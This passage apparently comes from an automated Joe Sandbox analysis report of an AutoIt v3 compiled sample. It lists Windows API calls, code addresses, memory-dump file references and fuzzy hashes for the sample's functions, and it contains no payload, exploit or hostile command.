                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                        • String ID: @$AutoIt v3 GUI
                                                                                        • API String ID: 867697134-3359773793
                                                                                        • Opcode ID: fdbc61900c1aed8a056052732ddde90303c00724007151b56a5ca0b78c61fe6f
                                                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                        • Opcode Fuzzy Hash: fdbc61900c1aed8a056052732ddde90303c00724007151b56a5ca0b78c61fe6f
                                                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 1503153545-1459072770
                                                                                        • Opcode ID: a7ebd4ac9e723ea675fb6b32263d9edea3ebf33deada9c3ab3fdd4587446856f
                                                                                        • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                        • Opcode Fuzzy Hash: a7ebd4ac9e723ea675fb6b32263d9edea3ebf33deada9c3ab3fdd4587446856f
                                                                                        • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsicoll$__wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                        • API String ID: 790654849-32604322
                                                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 32e01dcfee684d0de4b465c0a9c088f7828abbba238f4b11e8495382643bfb3a
                                                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                        • Opcode Fuzzy Hash: 32e01dcfee684d0de4b465c0a9c088f7828abbba238f4b11e8495382643bfb3a
                                                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                        APIs
                                                                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                        • _fseek.LIBCMT ref: 00452B3B
                                                                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                        • _wcscpy.LIBCMT ref: 00452BB0
                                                                                        • _wcscat.LIBCMT ref: 00452BC5
                                                                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                        • _wcscat.LIBCMT ref: 00452C07
                                                                                        • _wcscat.LIBCMT ref: 00452C1C
                                                                                        • __fread_nolock.LIBCMT ref: 00452C53
                                                                                        • __fread_nolock.LIBCMT ref: 00452C64
                                                                                        • __fread_nolock.LIBCMT ref: 00452C83
                                                                                        • __fread_nolock.LIBCMT ref: 00452C94
                                                                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                        • __fread_nolock.LIBCMT ref: 00452D78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 2054058615-0
                                                                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window
                                                                                        • String ID: 0
                                                                                        • API String ID: 2353593579-4108050209
                                                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                        APIs
                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                        • String ID:
                                                                                        • API String ID: 1744303182-0
                                                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                        • __mtterm.LIBCMT ref: 00417C34
                                                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                        • API String ID: 4163708885-3819984048
                                                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                        • API String ID: 0-1896584978
                                                                                        • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                        • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                        • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                        • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsicoll$IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2485277191-404129466
                                                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                        APIs
                                                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                        • String ID:
                                                                                        • API String ID: 3869813825-0
                                                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00464B28
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                        • _wcslen.LIBCMT ref: 00464C28
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                                                        • String ID: D
                                                                                        • API String ID: 1914653954-2746444292
                                                                                        • Opcode ID: 370002b9ce27089f4eef68b2553d26bfbf6da2b0c815b21cf4c0f3028eedf431
                                                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                        • Opcode Fuzzy Hash: 370002b9ce27089f4eef68b2553d26bfbf6da2b0c815b21cf4c0f3028eedf431
                                                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                        APIs
                                                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
